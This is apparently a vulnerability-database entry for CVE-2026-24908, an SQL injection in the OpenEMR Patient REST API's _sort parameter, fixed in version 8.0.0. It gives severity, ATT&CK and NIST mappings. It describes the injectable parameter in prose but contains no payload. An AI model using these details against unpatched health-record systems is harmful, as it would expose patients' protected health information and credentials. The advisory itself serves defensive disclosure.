CVE-2026-24908
Published: 25 February 2026
Summary
CVE-2026-24908 is a critical-severity SQL Injection (CWE-89) vulnerability in Open-Emr Openemr. Its CVSS base score is 9.9 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploitation for Privilege Escalation (T1068); ranked at the 0.0th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).
Threat & Defense at a Glance
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)AI
Directly mandates validation of user-supplied inputs like the _sort parameter to prevent SQL injection in the Patient REST API endpoint.
Enforces restrictions on information inputs such as whitelisting permitted sort field names to block arbitrary SQL injection via the _sort parameter.
Requires timely identification, reporting, and correction of the SQL injection flaw by upgrading to OpenEMR version 8.0.0 with proper input validation and escaping.
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
SQL injection in public-facing REST API directly enables remote exploitation of web application (T1190) and allows low-privileged authenticated users to escalate to full database access and credential compromise (T1068).
NVD Description
OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0, an SQL injection vulnerability in the Patient REST API endpoint allows authenticated users with API access to execute arbitrary SQL queries…
more
through the `_sort` parameter. This could potentially lead to database access, PHI (Protected Health Information) exposure, and credential compromise. The issue occurs when user-supplied sort field names are used in ORDER BY clauses without proper validation or identifier escaping. Version 8.0.0 fixes the issue.
Deeper analysisAI
CVE-2026-24908 is an SQL injection vulnerability (CWE-89) affecting OpenEMR, a free and open-source electronic health records and medical practice management application, in versions prior to 8.0.0. The flaw exists in the Patient REST API endpoint, where the `_sort` parameter allows authenticated users with API access to inject arbitrary SQL queries. This occurs because user-supplied sort field names are directly incorporated into ORDER BY clauses without proper validation or identifier escaping, earning a CVSS v3.1 base score of 9.9 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H).
An attacker with low-privilege authenticated access to the API can exploit this remotely with low complexity and no user interaction required. Successful exploitation enables execution of arbitrary SQL queries, potentially granting full database access, exposure of Protected Health Information (PHI), and compromise of credentials stored in the database.
The OpenEMR security advisory (GHSA-rcc2-45v3-qmqm) and associated commit (943e23cad6e979f87cdf168807fce2a7b32dd194) confirm that upgrading to version 8.0.0 resolves the issue through proper input validation and escaping in the affected endpoint.
Details
- CWE(s)